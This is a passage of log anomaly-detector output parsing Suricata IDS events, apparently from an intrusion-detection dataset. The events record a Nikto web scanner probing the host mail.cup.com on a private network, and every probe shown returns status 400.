"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": 
"text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46764, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2024454293684286,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2024454293684286, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.132560+0000\",\"flow_id\":2024454293684286,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:getinfo)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.13 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.134229 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46766 -> 192.168.10.154:80", "/parser/model/time": 1583349514.134229, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46766, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.134229 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant 
character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46766 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.13 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.134416+0000\",\"flow_id\":1832280276994169,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.134416, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1832280276994169,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": 
"text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46766, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1832280276994169,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1832280276994169, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.134416+0000\",\"flow_id\":1832280276994169,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.13 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.138294 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46768 -> 192.168.10.154:80", "/parser/model/time": 1583349514.138294, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46768, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.138294 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant 
character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46768 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.14 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.TPF", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.138485+0000\",\"flow_id\":1112705751193243,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TPF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TPF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.138485, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1112705751193243,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 
"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TPF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TPF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TPF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TPF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.TPF\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": 
",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.TPF\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.TPF", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.TPF", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", 
"/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46768, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1112705751193243,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1112705751193243, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.138485+0000\",\"flow_id\":1112705751193243,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TPF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TPF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.14 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.154534 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46770 -> 192.168.10.154:80", "/parser/model/time": 1583349514.154534, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46770, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.154534 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46770 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.15 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.SSIFilter", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.154766+0000\",\"flow_id\":124996417115902,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SSIFilter\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SSIFilter\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.154766, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", 
"/parser/model/flow_id": "\"flow_id\":124996417115902,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SSIFilter\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.SSIFilter\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46770,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.SSIFilter\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", 